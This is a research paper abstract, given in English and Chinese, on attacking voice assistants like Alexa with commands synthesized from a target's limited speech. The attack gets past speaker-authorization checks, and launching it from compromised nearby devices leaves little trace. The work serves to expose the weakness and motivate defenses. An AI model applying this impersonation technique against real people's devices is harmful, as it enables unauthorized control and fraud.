Recent advances in voice synthesis, coupled with the ease with which speech can be harvested for millions of people, introduce new threats to applications that are enabled by devices such as voice assistants (e.g., Amazon Alexa, Google Home etc.). We explore if unrelated and limited amount of speech from a target can be used to synthesize commands for a voice assistant like Amazon Alexa. More specifically, we investigate attacks on voice assistants with synthetic commands when they match command sources to authorized users, and applications (e.g., Alexa Skills) process commands only when their source is an authorized user with a chosen confidence level. We demonstrate that even simple concatenative speech synthesis can be used by an attacker to command voice assistants to perform sensitive operations. We also show that such attacks, when launched by exploiting compromised devices in the vicinity of voice assistants, can have relatively small host and network footprint. Our results demonstrate the need for better defenses against synthetic malicious commands that could target voice assistants.
翻译:近年来,语音合成技术的进步,加之从数百万人中采集语音数据的便捷性,为语音助手(如Amazon Alexa、Google Home等)设备所支持的应用带来了新的安全威胁。本研究探讨了是否可以利用目标对象少量且无关的语音样本来合成针对Amazon Alexa等语音助手的操控指令。具体而言,我们研究了当语音助手将指令来源与授权用户进行匹配,且应用程序(如Alexa Skills)仅在指令来源为授权用户并达到设定置信度时才执行命令时,合成语音指令对语音助手发起的攻击。我们证明,攻击者即使使用简单的拼接式语音合成技术,也能操控语音助手执行敏感操作。此外,我们还发现,当攻击者利用语音助手附近被入侵的设备发起此类攻击时,其在主机和网络层面留下的痕迹相对较小。我们的研究结果表明,有必要针对可能针对语音助手的恶意合成指令建立更有效的防御机制。